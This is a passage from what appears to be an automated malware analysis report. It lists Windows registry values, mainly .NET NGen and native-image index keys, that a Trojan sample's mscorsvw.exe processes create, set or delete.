[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 41 2C 9E CA 2C 20 2F 34 18 BF 8D 8C EF 06 83"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
The process mscorsvw.exe:3248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 4C DE 62 58 5E 05 D8 58 A2 9D 37 71 F1 F9 F7"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 B9 13 68 C9 BE 00 32 A3 FA B9 19 FE D0 FD 82"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:3372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
